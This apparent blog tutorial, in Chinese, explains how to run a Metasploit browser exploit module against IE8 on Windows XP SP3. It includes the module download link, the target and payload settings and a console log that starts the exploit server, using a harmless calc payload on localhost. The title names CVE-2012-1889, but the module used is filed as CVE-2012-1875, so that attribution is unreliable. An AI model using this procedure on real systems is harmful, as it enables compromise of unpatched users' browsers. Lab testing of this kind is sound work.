日期:2014-05-17  浏览次数:21160 次

使用Metasploit测试最新的IE8漏洞(CVE-2012-1889)

        本来想使用Metasploit的控制台来测试,但是控制台怎么也找不到这个exploit,暂不知道原因,后来使用msfgui来测试的。

        1、rb文件下载地址:http://dev.metasploit.com/redmine/projects/framework/repository/revisions/6abb7bb987a11dbcda8eb611831bcb2ff65070e0/entry/modules/exploits/windows/browser/ms12_037_same_id.rb

        2、把下载回来的rb文件放到C:\metasploit\msf3\modules\exploits\magictong\cve-2012-1875.rb,我改了名,放到了magictong文件夹下面,你也可以不改名,或者放到已有的文件夹下面,但是一定要放到exploits下面,你懂的。

        3、在msfgui界面上,使用File菜单Search选项,搜索2012-1889,如图,不出意外应该是可以搜索到的啊!


        4、选中搜到的条目,具体就是上面的magictong/cve-2012-1875 - Normal,然后点击Launch按钮,进入配置页面。


        5、在配置页面,首先选择Targets,我的目标系统是xpsp3,我选择了IE 8 on Windows XP SP3 with msvcrt ROP,因为这个漏洞要过DEP,因此利用会麻烦点。


        6、然后选择Payload,这里选择了exec,启动calc(计算器)。SRVHOST里面输入本机(MSF所在的机器,不是有漏洞的机器,如果有漏洞机器就是MSF所在的机器,则输入127.0.0.1即可)的局域网IP,如果直接在本机测试,输入127.0.0.1即可。


        7、然后点击Run inConsole ,等待,直到msfgui的主界面下console TAB页打出如下信息:

msf  exploit(cve-2012-1875) > use exploit/magictong/cve-2012-1875
msf  exploit(cve-2012-1875) > set TARGET 1
TARGET => 1
msf  exploit(cve-2012-1875) > set PAYLOAD windows/exec
msf  exploit(cve-2012-1875) > set CMD calc
PAYLOAD => windows/exec
CMD => calc
msf  exploit(cve-2012-1875) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf  exploit(cve-2012-1875) > exploit
[*] Exploit running as background job.
[*] Using URL: http://127.0.0.1:8080/V6rnzyBsbnnmWIv
[*] Server started.

        8、现在你就可以使用http://127.0.0.1:8080/V6rnzyBsbnnmWIv在本机进行测试了。